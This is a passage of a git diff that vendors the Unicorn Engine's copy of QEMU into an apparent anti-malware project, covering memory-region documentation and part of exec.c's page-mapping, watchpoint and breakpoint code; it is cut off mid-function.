for intermediate MemoryRegions too. +These represent memory as seen from the CPU or a device's viewpoint. + +Types of regions +---------------- + +There are four types of memory regions (all represented by a single C type +MemoryRegion): + +- RAM: a RAM region is simply a range of host memory that can be made available + to the guest. + +- MMIO: a range of guest memory that is implemented by host callbacks; + each read or write causes a callback to be called on the host. + +- container: a container simply includes other memory regions, each at + a different offset. Containers are useful for grouping several regions + into one unit. For example, a PCI BAR may be composed of a RAM region + and an MMIO region. + + A container's subregions are usually non-overlapping. In some cases it is + useful to have overlapping regions; for example a memory controller that + can overlay a subregion of RAM with MMIO or ROM, or a PCI controller + that does not prevent card from claiming overlapping BARs. + +- alias: a subsection of another region. Aliases allow a region to be + split apart into discontiguous regions. Examples of uses are memory banks + used when the guest address space is smaller than the amount of RAM + addressed, or a memory controller that splits main memory to expose a "PCI + hole". Aliases may point to any type of region, including other aliases, + but an alias may not point back to itself, directly or indirectly. + +It is valid to add subregions to a region which is not a pure container +(that is, to an MMIO, RAM or ROM region). This means that the region +will act like a container, except that any addresses within the container's +region which are not claimed by any subregion are handled by the +container itself (ie by its MMIO callbacks or RAM backing). However +it is generally possible to achieve the same effect with a pure container +one of whose subregions is a low priority "background" region covering +the whole address range; this is often clearer and is preferred. +Subregions cannot be added to an alias region. + +Region names +------------ + +Regions are assigned names by the constructor. For most regions these are +only used for debugging purposes, but RAM regions also use the name to identify +live migration sections. This means that RAM region names need to have ABI +stability. + +Region lifecycle +---------------- + +A region is created by one of the constructor functions (memory_region_init*()) +and attached to an object. It is then destroyed by object_unparent() or simply +when the parent object dies. + +In between, a region can be added to an address space +by using memory_region_add_subregion() and removed using +memory_region_del_subregion(). Destroying the region implicitly +removes the region from the address space. + +Region attributes may be changed at any point; they take effect once +the region becomes exposed to the guest. + +Overlapping regions and priority +-------------------------------- +Usually, regions may not overlap each other; a memory address decodes into +exactly one target. In some cases it is useful to allow regions to overlap, +and sometimes to control which of an overlapping regions is visible to the +guest. This is done with memory_region_add_subregion_overlap(), which +allows the region to overlap any other region in the same container, and +specifies a priority that allows the core to decide which of two regions at +the same address are visible (highest wins). +Priority values are signed, and the default value is zero. This means that +you can use memory_region_add_subregion_overlap() both to specify a region +that must sit 'above' any others (with a positive priority) and also a +background region that sits 'below' others (with a negative priority). + +If the higher priority region in an overlap is a container or alias, then +the lower priority region will appear in any "holes" that the higher priority +region has left by not mapping subregions to that area of its address range. +(This applies recursively -- if the subregions are themselves containers or +aliases that leave holes then the lower priority region will appear in these +holes too.) + +For example, suppose we have a container A of size 0x8000 with two subregions +B and C. B is a container mapped at 0x2000, size 0x4000, priority 1; C is +an MMIO region mapped at 0x0, size 0x6000, priority 2. B currently has two +of its own subregions: D of size 0x1000 at offset 0 and E of size 0x1000 at +offset 0x2000. As a diagram: + + 0 1000 2000 3000 4000 5000 6000 7000 8000 + |------|------|------|------|------|------|------|-------| + A: [ ] + C: [CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC] + B: [ ] + D: [DDDDD] + E: [EEEEE] + +The regions that will be seen within this address range then are: + [CCCCCCCCCCCC][DDDDD][CCCCC][EEEEE][CCCCC] + +Since B has higher priority than C, its subregions appear in the flat map +even where they overlap with C. In ranges where B has not mapped anything +C's region appears. + +If B had provided its own MMIO operations (ie it was not a pure container) +then these would be used for any addresses in its range not handled by +D or E, and the result would be: + [CCCCCCCCCCCC][DDDDD][BBBBB][EEEEE][BBBBB] + +Priority values are local to a container, because the priorities of two +regions are only compared when they are both children of the same container. +This means that the device in charge of the container (typically modelling +a bus or a memory controller) can use them to manage the interaction of +its child regions without any side effects on other parts of the system. +In the example above, the priorities of D and E are unimportant because +they do not overlap each other. It is the relative priority of B and C +that causes D and E to appear on top of C: D and E's priorities are never +compared against the priority of C. + +Visibility +---------- +The memory core uses the following rules to select a memory region when the +guest accesses an address: + +- all direct subregions of the root region are matched against the address, in + descending priority order + - if the address lies outside the region offset/size, the subregion is + discarded + - if the subregion is a leaf (RAM or MMIO), the search terminates, returning + this leaf region + - if the subregion is a container, the same algorithm is used within the + subregion (after the address is adjusted by the subregion offset) + - if the subregion is an alias, the search is continued at the alias target + (after the address is adjusted by the subregion offset and alias offset) + - if a recursive search within a container or alias subregion does not + find a match (because of a "hole" in the container's coverage of its + address range), then if this is a container with its own MMIO or RAM + backing the search terminates, returning the container itself. Otherwise + we continue with the next subregion in priority order +- if none of the subregions match the address then the search terminates + with no match found + +Example memory map +------------------ + +system_memory: container@0-2^48-1 + | + +---- lomem: alias@0-0xdfffffff ---> #ram (0-0xdfffffff) + | + +---- himem: alias@0x100000000-0x11fffffff ---> #ram (0xe0000000-0xffffffff) + | + +---- vga-window: alias@0xa0000-0xbfffff ---> #pci (0xa0000-0xbffff) + | (prio 1) + | + +---- pci-hole: alias@0xe0000000-0xffffffff ---> #pci (0xe0000000-0xffffffff) + +pci (0-2^32-1) + | + +--- vga-area: container@0xa0000-0xbffff + | | + | +--- alias@0x00000-0x7fff ---> #vram (0x010000-0x017fff) + | | + | +--- alias@0x08000-0xffff ---> #vram (0x020000-0x027fff) + | + +---- vram: ram@0xe1000000-0xe1ffffff + | + +---- vga-mmio: mmio@0xe2000000-0xe200ffff + +ram: ram@0x00000000-0xffffffff + +This is a (simplified) PC memory map. The 4GB RAM block is mapped into the +system address space via two aliases: "lomem" is a 1:1 mapping of the first +3.5GB; "himem" maps the last 0.5GB at address 4GB. This leaves 0.5GB for the +so-called PCI hole, that allows a 32-bit PCI bus to exist in a system with +4GB of memory. + +The memory controller diverts addresses in the range 640K-768K to the PCI +address space. This is modelled using the "vga-window" alias, mapped at a +higher priority so it obscures the RAM at the same addresses. The vga window +can be removed by programming the memory controller; this is modelled by +removing the alias and exposing the RAM underneath. + +The pci address space is not a direct child of the system address space, since +we only want parts of it to be visible (we accomplish this using aliases). +It has two subregions: vga-area models the legacy vga window and is occupied +by two 32K memory banks pointing at two sections of the framebuffer. +In addition the vram is mapped as a BAR at address e1000000, and an additional +BAR containing MMIO registers is mapped after it. + +Note that if the guest maps a BAR outside the PCI hole, it would not be +visible as the pci-hole alias clips it to a 0.5GB range. + +Attributes +---------- + +Various region attributes (read-only, dirty logging, coalesced mmio, ioeventfd) +can be changed during the region lifecycle. They take effect once the region +is made visible (which can be immediately, later, or never). + +MMIO Operations +--------------- + +MMIO regions are provided with ->read() and ->write() callbacks; in addition +various constraints can be supplied to control how these callbacks are called: + + - .valid.min_access_size, .valid.max_access_size define the access sizes + (in bytes) which the device accepts; accesses outside this range will + have device and bus specific behaviour (ignored, or machine check) + - .valid.aligned specifies that the device only accepts naturally aligned + accesses. Unaligned accesses invoke device and bus specific behaviour. + - .impl.min_access_size, .impl.max_access_size define the access sizes + (in bytes) supported by the *implementation*; other access sizes will be + emulated using the ones available. For example a 4-byte write will be + emulated using four 1-byte writes, if .impl.max_access_size = 1. + - .impl.unaligned specifies that the *implementation* supports unaligned + accesses; if false, unaligned accesses will be emulated by two aligned + accesses. + - .old_mmio can be used to ease porting from code using + cpu_register_io_memory(). It should not be used in new code. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/exec.c b/ai_anti_malware/unicorn/unicorn-master/qemu/exec.c new file mode 100644 index 0000000..9e4fa5d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/exec.c @@ -0,0 +1,2347 @@ +/* + * Virtual page mapping + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "config.h" +#ifndef _WIN32 +#include <sys/types.h> +#include <sys/mman.h> +#endif + +#include "qemu-common.h" +#include "cpu.h" +#include "tcg.h" +#include "hw/hw.h" +#include "hw/qdev.h" +#include "qemu/osdep.h" +#include "sysemu/sysemu.h" +#include "qemu/timer.h" +#include "exec/memory.h" +#include "exec/address-spaces.h" +#if defined(CONFIG_USER_ONLY) +#include <qemu.h> +#endif +#include "exec/cpu-all.h" + +#include "exec/cputlb.h" +#include "translate-all.h" + +#include "exec/memory-internal.h" +#include "exec/ram_addr.h" + +#include "qemu/range.h" + +#include "uc_priv.h" + +//#define DEBUG_SUBPAGE + +#if !defined(CONFIG_USER_ONLY) + +/* RAM is pre-allocated and passed into qemu_ram_alloc_from_ptr */ +#define RAM_PREALLOC (1 << 0) + +/* RAM is mmap-ed with MAP_SHARED */ +#define RAM_SHARED (1 << 1) + +#endif + +#if !defined(CONFIG_USER_ONLY) +/* current CPU in the current thread. It is only valid inside + cpu_exec() */ +//DEFINE_TLS(CPUState *, current_cpu); + +typedef struct PhysPageEntry PhysPageEntry; + +struct PhysPageEntry { + /* How many bits skip to next level (in units of L2_SIZE). 0 for a leaf. */ + uint32_t skip : 6; + /* index into phys_sections (!skip) or phys_map_nodes (skip) */ + uint32_t ptr : 26; +}; + +#define PHYS_MAP_NODE_NIL (((uint32_t)~0) >> 6) + +/* Size of the L2 (and L3, etc) page tables. */ +#define ADDR_SPACE_BITS 64 + +#define P_L2_BITS 9 +#define P_L2_SIZE (1 << P_L2_BITS) + +#define P_L2_LEVELS (((ADDR_SPACE_BITS - TARGET_PAGE_BITS - 1) / P_L2_BITS) + 1) + +typedef PhysPageEntry Node[P_L2_SIZE]; + +typedef struct PhysPageMap { + unsigned sections_nb; + unsigned sections_nb_alloc; + unsigned nodes_nb; + unsigned nodes_nb_alloc; + Node *nodes; + MemoryRegionSection *sections; +} PhysPageMap; + +struct AddressSpaceDispatch { + /* This is a multi-level map on the physical address space. + * The bottom level has pointers to MemoryRegionSections. + */ + PhysPageEntry phys_map; + PhysPageMap map; + AddressSpace *as; +}; + +#define SUBPAGE_IDX(addr) ((addr) & ~TARGET_PAGE_MASK) +typedef struct subpage_t { + MemoryRegion iomem; + AddressSpace *as; + hwaddr base; + uint16_t sub_section[TARGET_PAGE_SIZE]; +} subpage_t; + +#define PHYS_SECTION_UNASSIGNED 0 +#define PHYS_SECTION_NOTDIRTY 1 +#define PHYS_SECTION_ROM 2 +#define PHYS_SECTION_WATCH 3 + +static void memory_map_init(struct uc_struct *uc); +static void tcg_commit(MemoryListener *listener); + +#endif + +#if !defined(CONFIG_USER_ONLY) + +static void phys_map_node_reserve(PhysPageMap *map, unsigned nodes) +{ + if (map->nodes_nb + nodes > map->nodes_nb_alloc) { + map->nodes_nb_alloc = MAX(map->nodes_nb_alloc * 2, 16); + map->nodes_nb_alloc = MAX(map->nodes_nb_alloc, map->nodes_nb + nodes); + map->nodes = g_renew(Node, map->nodes, map->nodes_nb_alloc); + } +} + +static uint32_t phys_map_node_alloc(PhysPageMap *map) +{ + unsigned i; + uint32_t ret; + + ret = map->nodes_nb++; + assert(ret != PHYS_MAP_NODE_NIL); + assert(ret != map->nodes_nb_alloc); + for (i = 0; i < P_L2_SIZE; ++i) { + map->nodes[ret][i].skip = 1; + map->nodes[ret][i].ptr = PHYS_MAP_NODE_NIL; + } + return ret; +} + +static void phys_page_set_level(PhysPageMap *map, PhysPageEntry *lp, + hwaddr *index, hwaddr *nb, uint16_t leaf, + int level) +{ + PhysPageEntry *p; + int i; + hwaddr step = (hwaddr)1 << (level * P_L2_BITS); + + if (lp->skip && lp->ptr == PHYS_MAP_NODE_NIL) { + lp->ptr = phys_map_node_alloc(map); + p = map->nodes[lp->ptr]; + if (level == 0) { + for (i = 0; i < P_L2_SIZE; i++) { + p[i].skip = 0; + p[i].ptr = PHYS_SECTION_UNASSIGNED; + } + } + } else { + p = map->nodes[lp->ptr]; + } + lp = &p[(*index >> (level * P_L2_BITS)) & (P_L2_SIZE - 1)]; + + while (*nb && lp < &p[P_L2_SIZE]) { + if ((*index & (step - 1)) == 0 && *nb >= step) { + lp->skip = 0; + lp->ptr = leaf; + *index += step; + *nb -= step; + } else { + phys_page_set_level(map, lp, index, nb, leaf, level - 1); + } + ++lp; + } +} + +static void phys_page_set(AddressSpaceDispatch *d, + hwaddr index, hwaddr nb, + uint16_t leaf) +{ + /* Wildly overreserve - it doesn't matter much. */ + phys_map_node_reserve(&d->map, 3 * P_L2_LEVELS); + + phys_page_set_level(&d->map, &d->phys_map, &index, &nb, leaf, P_L2_LEVELS - 1); +} + +/* Compact a non leaf page entry. Simply detect that the entry has a single child, + * and update our entry so we can skip it and go directly to the destination. + */ +static void phys_page_compact(PhysPageEntry *lp, Node *nodes, unsigned long *compacted) +{ + unsigned valid_ptr = P_L2_SIZE; + int valid = 0; + PhysPageEntry *p; + int i; + + if (lp->ptr == PHYS_MAP_NODE_NIL) { + return; + } + + p = nodes[lp->ptr]; + for (i = 0; i < P_L2_SIZE; i++) { + if (p[i].ptr == PHYS_MAP_NODE_NIL) { + continue; + } + + valid_ptr = i; + valid++; + if (p[i].skip) { + phys_page_compact(&p[i], nodes, compacted); + } + } + + /* We can only compress if there's only one child. */ + if (valid != 1) { + return; + } + + assert(valid_ptr < P_L2_SIZE); + + /* Don't compress if it won't fit in the # of bits we have. */ + if (lp->skip + p[valid_ptr].skip >= (1 << 3)) { + return; + } + + lp->ptr = p[valid_ptr].ptr; + if (!p[valid_ptr].skip) { + /* If our only child is a leaf, make this a leaf. */ + /* By design, we should have made this node a leaf to begin with so we + * should never reach here. + * But since it's so simple to handle this, let's do it just in case we + * change this rule. + */ + lp->skip = 0; + } else { + lp->skip += p[valid_ptr].skip; + } +} + +static void phys_page_compact_all(AddressSpaceDispatch *d, int nodes_nb) +{ + //DECLARE_BITMAP(compacted, nodes_nb); + // this isnt actually used + unsigned long* compacted = NULL; + + if (d->phys_map.skip) { + phys_page_compact(&d->phys_map, d->map.nodes, compacted); + } +} + +static MemoryRegionSection *phys_page_find(PhysPageEntry lp, hwaddr addr, + Node *nodes, MemoryRegionSection *sections) +{ + PhysPageEntry *p; + hwaddr index = addr >> TARGET_PAGE_BITS; + int i; + + for (i = P_L2_LEVELS; lp.skip && (i -= lp.skip) >= 0;) { + if (lp.ptr == PHYS_MAP_NODE_NIL) { + return §ions[PHYS_SECTION_UNASSIGNED]; + } + p = nodes[lp.ptr]; + lp = p[(index >> (i * P_L2_BITS)) & (P_L2_SIZE - 1)]; + } + + if (sections[lp.ptr].size.hi || + range_covers_byte(sections[lp.ptr].offset_within_address_space, + sections[lp.ptr].size.lo, addr)) { + return §ions[lp.ptr]; + } else { + return §ions[PHYS_SECTION_UNASSIGNED]; + } +} + +bool memory_region_is_unassigned(struct uc_struct* uc, MemoryRegion *mr) +{ + return mr != &uc->io_mem_rom && mr != &uc->io_mem_notdirty && + !mr->rom_device && mr != &uc->io_mem_watch; +} + +static MemoryRegionSection *address_space_lookup_region(AddressSpaceDispatch *d, + hwaddr addr, + bool resolve_subpage) +{ + MemoryRegionSection *section; + subpage_t *subpage; + + section = phys_page_find(d->phys_map, addr, d->map.nodes, d->map.sections); + if (resolve_subpage && section->mr->subpage) { + subpage = container_of(section->mr, subpage_t, iomem); + section = &d->map.sections[subpage->sub_section[SUBPAGE_IDX(addr)]]; + } + return section; +} + +static MemoryRegionSection * +address_space_translate_internal(AddressSpaceDispatch *d, hwaddr addr, hwaddr *xlat, + hwaddr *plen, bool resolve_subpage) +{ + MemoryRegionSection *section; + Int128 diff; + + section = address_space_lookup_region(d, addr, resolve_subpage); + /* Compute offset within MemoryRegionSection */ + addr -= section->offset_within_address_space; + + /* Compute offset within MemoryRegion */ + *xlat = addr + section->offset_within_region; + + diff = int128_sub(section->mr->size, int128_make64(addr)); + *plen = int128_get64(int128_min(diff, int128_make64(*plen))); + return section; +} + +static inline bool memory_access_is_direct(MemoryRegion *mr, bool is_write) +{ + if (memory_region_is_ram(mr)) { + return !(is_write && mr->readonly); + } + if (memory_region_is_romd(mr)) { + return !is_write; + } + + return false; +} + +MemoryRegion *address_space_translate(AddressSpace *as, hwaddr addr, + hwaddr *xlat, hwaddr *plen, + bool is_write) +{ + IOMMUTLBEntry iotlb; + MemoryRegionSection *section; + MemoryRegion *mr; + hwaddr len = *plen; + + for (;;) { + section = address_space_translate_internal(as->dispatch, addr, &addr, plen, true); + mr = section->mr; + if (mr->ops == NULL) + return NULL; + + if (!mr->iommu_ops) { + break; + } + + iotlb = mr->iommu_ops->translate(mr, addr, is_write); + addr = ((iotlb.translated_addr & ~iotlb.addr_mask) + | (addr & iotlb.addr_mask)); + len = MIN(len, (addr | iotlb.addr_mask) - addr + 1); + if (!(iotlb.perm & (1 << is_write))) { + mr = &as->uc->io_mem_unassigned; + break; + } + + as = iotlb.target_as; + } + + *plen = len; + *xlat = addr; + return mr; +} + +MemoryRegionSection * +address_space_translate_for_iotlb(AddressSpace *as, hwaddr addr, hwaddr *xlat, + hwaddr *plen) +{ + MemoryRegionSection *section; + section = address_space_translate_internal(as->dispatch, addr, xlat, plen, false); + + assert(!section->mr->iommu_ops); + return section; +} +#endif + +CPUState *qemu_get_cpu(struct uc_struct *uc, int index) +{ + CPUState *cpu = uc->cpu; + if (cpu->cpu_index == index) { + return cpu; + } + return NULL; +} + +#if !defined(CONFIG_USER_ONLY) +void tcg_cpu_address_space_init(CPUState *cpu, AddressSpace *as) +{ + /* We only support one address space per cpu at the moment. */ + assert(cpu->as == as); + + if (cpu->tcg_as_listener) { + memory_listener_unregister(as->uc, cpu->tcg_as_listener); + } else { + cpu->tcg_as_listener = g_new0(MemoryListener, 1); + } + cpu->tcg_as_listener->commit = tcg_commit; + memory_listener_register(as->uc, cpu->tcg_as_listener, as); +} +#endif + +void cpu_exec_init(CPUArchState *env, void *opaque) +{ + struct uc_struct *uc = opaque; + CPUState *cpu = ENV_GET_CPU(env); + + cpu->uc = uc; + env->uc = uc; + + cpu->cpu_index = 0; + cpu->numa_node = 0; + QTAILQ_INIT(&cpu->breakpoints); + QTAILQ_INIT(&cpu->watchpoints); + + cpu->as = &uc->as; + + // TODO: assert uc does not already have a cpu? + uc->cpu = cpu; +} + +#if defined(TARGET_HAS_ICE) +#if defined(CONFIG_USER_ONLY) +static void breakpoint_invalidate(CPUState *cpu, target_ulong pc) +{ + tb_invalidate_phys_page_range(pc, pc + 1, 0); +} +#else +static void breakpoint_invalidate(CPUState *cpu, target_ulong pc) +{ + hwaddr phys = cpu_get_phys_page_debug(cpu, pc); + if (phys != -1) { + tb_invalidate_phys_addr(cpu->as, + phys | (pc & ~TARGET_PAGE_MASK)); + } +} +#endif +#endif /* TARGET_HAS_ICE */ + +#if defined(CONFIG_USER_ONLY) +void cpu_watchpoint_remove_all(CPUState *cpu, int mask) + +{ +} + +int cpu_watchpoint_remove(CPUState *cpu, vaddr addr, vaddr len, + int flags) +{ + return -ENOSYS; +} + +void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint) +{ +} + +int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, + int flags, CPUWatchpoint **watchpoint) +{ + return -ENOSYS; +} +#else +/* Add a watchpoint. */ +int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, + int flags, CPUWatchpoint **watchpoint) +{ + CPUWatchpoint *wp; + + /* forbid ranges which are empty or run off the end of the address space */ + if (len == 0 || (addr + len - 1) < addr) { + return -EINVAL; + } + wp = g_malloc(sizeof(*wp)); + + wp->vaddr = addr; + wp->len = len; + wp->flags = flags; + + /* keep all GDB-injected watchpoints in front */ + if (flags & BP_GDB) { + QTAILQ_INSERT_HEAD(&cpu->watchpoints, wp, entry); + } else { + QTAILQ_INSERT_TAIL(&cpu->watchpoints, wp, entry); + } + + tlb_flush_page(cpu, addr); + + if (watchpoint) + *watchpoint = wp; + return 0; +} + +/* Remove a specific watchpoint. */ +int cpu_watchpoint_remove(CPUState *cpu, vaddr addr, vaddr len, + int flags) +{ + CPUWatchpoint *wp; + + QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) { + if (addr == wp->vaddr && len == wp->len + && flags == (wp->flags & ~BP_WATCHPOINT_HIT)) { + cpu_watchpoint_remove_by_ref(cpu, wp); + return 0; + } + } + return -ENOENT; +} + +/* Remove a specific watchpoint by reference. */ +void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint) +{ + QTAILQ_REMOVE(&cpu->watchpoints, watchpoint, entry); + + tlb_flush_page(cpu, watchpoint->vaddr); + + g_free(watchpoint); +} + +/* Remove all matching watchpoints. */ +void cpu_watchpoint_remove_all(CPUState *cpu, int mask) +{ + CPUWatchpoint *wp, *next; + + QTAILQ_FOREACH_SAFE(wp, &cpu->watchpoints, entry, next) { + if (wp->flags & mask) { + cpu_watchpoint_remove_by_ref(cpu, wp); + } + } +} + +/* Return true if this watchpoint address matches the specified + * access (ie the address range covered by the watchpoint overlaps + * partially or completely with the address range covered by the + * access). + */ +static inline bool cpu_watchpoint_address_matches(CPUWatchpoint *wp, + vaddr addr, + vaddr len) +{ + /* We know the lengths are non-zero, but a little caution is + * required to avoid errors in the case where the range ends + * exactly at the top of the address space and so addr + len + * wraps round to zero. + */ + vaddr wpend = wp->vaddr + wp->len - 1; + vaddr addrend = addr + len - 1; + + return !(addr > wpend || wp->vaddr > addrend); +} + +#endif + +/* Add a breakpoint. */ +int cpu_breakpoint_insert(CPUState *cpu, vaddr pc, int flags, + CPUBreakpoint **breakpoint) +{ +#if defined(TARGET_HAS_ICE) + CPUBreakpoint *bp; + + bp = g_malloc(sizeof(*bp)); + + bp->pc = pc; + bp->flags = flags; + + /* keep all GDB-injected breakpoints in front */ + if (flags & BP_GDB) { + QTAILQ_INSERT_HEAD(&cpu->breakpoints, bp, entry); + } else { + QTAILQ_INSERT_TAIL(&cpu->breakpoints, bp, entry); + } + + breakpoint_invalidate(cpu, pc); + + if (breakpoint) { + *breakpoint = bp; + } + return 0; +#else + return -ENOSYS; +#endif +} + +/* Remove a specific breakpoint. */ +int cpu_breakpoint_remove(CPUState *cpu, vaddr pc, int flags) +{ +#if defined(TARGET_HAS_ICE) + CPUBreakpoint *bp; + + QTAILQ_FOREACH(bp, &cpu->breakpoints, entry) { + if (bp->pc == pc && bp->flags == flags) { + cpu_breakpoint_remove_by_ref(cpu, bp); + return 0; + } + } + return -ENOENT; +#else + return -ENOSYS; +#endif +} + +/* Remove a specific breakpoint by reference. */ +void cpu_breakpoint_remove_by_ref(CPUState *cpu, CPUBreakpoint *breakpoint) +{ +#if defined(TARGET_HAS_ICE) + QTAILQ_REMOVE(&cpu->breakpoints, breakpoint, entry); + + breakpoint_invalidate(cpu, breakpoint->pc); + + g_free(breakpoint); +#endif +} + +/* Remove all matching breakpoints. */ +void cpu_breakpoint_remove_all(CPUState *cpu, int mask) +{ +#if defined(TARGET_HAS_ICE) + CPUBreakpoint *bp, *next; + + QTAILQ_FOREACH_SAFE(bp, &cpu->breakpoints, entry, next) { + if (bp->flags & mask) { + cpu_breakpoint_remove_by_ref(cpu, bp); + } + } +#endif +} + +/* enable or disable single step mode. EXCP_DEBUG is returned by the + CPU loop after each instruction */ +void cpu_single_step(CPUState *cpu, int enabled) +{ +#if defined(TARGET_HAS_ICE) + if (cpu->singlestep_enabled != enabled) { + CPUArchState *env; + cpu->singlestep_enabled = enabled; + /* must flush all the translated code to avoid inconsistencies */ + /* XXX: only flush what is necessary */ + env = cpu->env_ptr; + tb_flush(env); + } +#endif +} + +void cpu_abort(CPUState *cpu, const char *fmt, ...) +{ + va_list ap; + va_list ap2; + + va_start(ap, fmt); + va_copy(ap2, ap); + fprintf(stderr, "qemu: fatal: "); + vfprintf(stderr, fmt, ap); + fprintf(stderr, "\n"); + cpu_dump_state(cpu, stderr, fprintf, CPU_DUMP_FPU | CPU_DUMP_CCOP); + if (qemu_log_enabled()) { + qemu_log("qemu: fatal: "); + qemu_log_vprintf(fmt, ap2); + qemu_log("\n"); + log_cpu_state(cpu, CPU_DUMP_FPU | CPU_DUMP_CCOP); + qemu_log_flush(); + qemu_log_close(); + } + va_end(ap2); + va_end(ap); +#if defined(CONFIG_USER_ONLY) + { + struct sigaction act; + sigfillset(&act.sa_mask); + act.sa_handler = SIG_DFL; + sigaction(SIGABRT, &act, NULL); + } +#endif + abort(); +} + +#if !defined(CONFIG_USER_ONLY) +static RAMBlock *qemu_get_ram_block(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block; + + /* The list is protected by the iothread lock here. */ + block = uc->ram_list.mru_block; + if (block && addr - block->offset < block->length) { + goto found; + } + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (addr - block->offset < block->length) { + goto found; + } + } + + fprintf(stderr, "Bad ram offset %" PRIx64 "\n", (uint64_t)addr); + abort(); + +found: + uc->ram_list.mru_block = block; + return block; +} + +static void tlb_reset_dirty_range_all(struct uc_struct* uc, + ram_addr_t start, ram_addr_t length) +{ + ram_addr_t start1; + RAMBlock *block; + ram_addr_t end; + + end = TARGET_PAGE_ALIGN(start + length); + start &= TARGET_PAGE_MASK; + + block = qemu_get_ram_block(uc, start); + assert(block == qemu_get_ram_block(uc, end - 1)); + start1 = (uintptr_t)block->host + (start - block->offset); + cpu_tlb_reset_dirty_all(uc, start1, length); +} + +/* Note: start and end must be within the same ram block. */ +void cpu_physical_memory_reset_dirty(struct uc_struct* uc, + ram_addr_t start, ram_addr_t length, unsigned client) +{ + if (length == 0) + return; + cpu_physical_memory_clear_dirty_range(uc, start, length, client); + + if (tcg_enabled(uc)) { + tlb_reset_dirty_range_all(uc, start, length); + } +} + +hwaddr memory_region_section_get_iotlb(CPUState *cpu, + MemoryRegionSection *section, + target_ulong vaddr, + hwaddr paddr, hwaddr xlat, + int prot, + target_ulong *address) +{ + hwaddr iotlb; + CPUWatchpoint *wp; + + if (memory_region_is_ram(section->mr)) { + /* Normal RAM. */ + iotlb = (memory_region_get_ram_addr(section->mr) & TARGET_PAGE_MASK) + + xlat; + if (!section->readonly) { + iotlb |= PHYS_SECTION_NOTDIRTY; + } else { + iotlb |= PHYS_SECTION_ROM; + } + } else { + iotlb = section - section->address_space->dispatch->map.sections; + iotlb += xlat; + } + + /* Make accesses to pages with watchpoints go via the + watchpoint trap routines. */ + QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) { + if (cpu_watchpoint_address_matches(wp, vaddr, TARGET_PAGE_SIZE)) { + /* Avoid trapping reads of pages with a write breakpoint. */ + if ((prot & PAGE_WRITE) || (wp->flags & BP_MEM_READ)) { + iotlb = PHYS_SECTION_WATCH + paddr; + *address |= TLB_MMIO; + break; + } + } + } + + return iotlb; +} +#endif /* defined(CONFIG_USER_ONLY) */ + +#if !defined(CONFIG_USER_ONLY) + +static int subpage_register (subpage_t *mmio, uint32_t start, uint32_t end, + uint16_t section); +static subpage_t *subpage_init(AddressSpace *as, hwaddr base); + +static void *(*phys_mem_alloc)(size_t size, uint64_t *align) = +qemu_anon_ram_alloc; + +/* + * Set a custom physical guest memory alloator. + * Accelerators with unusual needs may need this. Hopefully, we can + * get rid of it eventually. + */ +void phys_mem_set_alloc(void *(*alloc)(size_t, uint64_t *align)) +{ + phys_mem_alloc = alloc; +} + +static uint16_t phys_section_add(PhysPageMap *map, + MemoryRegionSection *section) +{ + /* The physical section number is ORed with a page-aligned + * pointer to produce the iotlb entries. Thus it should + * never overflow into the page-aligned value. + */ + assert(map->sections_nb < TARGET_PAGE_SIZE); + + if (map->sections_nb == map->sections_nb_alloc) { + map->sections_nb_alloc = MAX(map->sections_nb_alloc * 2, 16); + map->sections = g_renew(MemoryRegionSection, map->sections, + map->sections_nb_alloc); + } + map->sections[map->sections_nb] = *section; + memory_region_ref(section->mr); + return map->sections_nb++; +} + +static void phys_section_destroy(MemoryRegion *mr) +{ + memory_region_unref(mr); + + if (mr->subpage) { + subpage_t *subpage = container_of(mr, subpage_t, iomem); + object_unref(mr->uc, OBJECT(&subpage->iomem)); + g_free(subpage); + } +} + +static void phys_sections_free(PhysPageMap *map) +{ + while (map->sections_nb > 0) { + MemoryRegionSection *section = &map->sections[--map->sections_nb]; + phys_section_destroy(section->mr); + } + g_free(map->sections); + g_free(map->nodes); +} + +static void register_subpage(struct uc_struct* uc, + AddressSpaceDispatch *d, MemoryRegionSection *section) +{ + subpage_t *subpage; + hwaddr base = section->offset_within_address_space + & TARGET_PAGE_MASK; + MemoryRegionSection *existing = phys_page_find(d->phys_map, base, + d->map.nodes, d->map.sections); + hwaddr start, end; + MemoryRegionSection subsection = MemoryRegionSection_make(NULL, NULL, 0, int128_make64(TARGET_PAGE_SIZE), base, false); + + assert(existing->mr->subpage || existing->mr == &uc->io_mem_unassigned); + + if (!(existing->mr->subpage)) { + subpage = subpage_init(d->as, base); + subsection.address_space = d->as; + subsection.mr = &subpage->iomem; + phys_page_set(d, base >> TARGET_PAGE_BITS, 1, + phys_section_add(&d->map, &subsection)); + } else { + subpage = container_of(existing->mr, subpage_t, iomem); + } + start = section->offset_within_address_space & ~TARGET_PAGE_MASK; + end = start + int128_get64(section->size) - 1; + subpage_register(subpage, start, end, + phys_section_add(&d->map, section)); + //g_free(subpage); +} + + +static void register_multipage(AddressSpaceDispatch *d, + MemoryRegionSection *section) +{ + hwaddr start_addr = section->offset_within_address_space; + uint16_t section_index = phys_section_add(&d->map, section); + uint64_t num_pages = int128_get64(int128_rshift(section->size, + TARGET_PAGE_BITS)); + + assert(num_pages); + phys_page_set(d, start_addr >> TARGET_PAGE_BITS, num_pages, section_index); +} + +static void mem_add(MemoryListener *listener, MemoryRegionSection *section) +{ + AddressSpace *as = container_of(listener, AddressSpace, 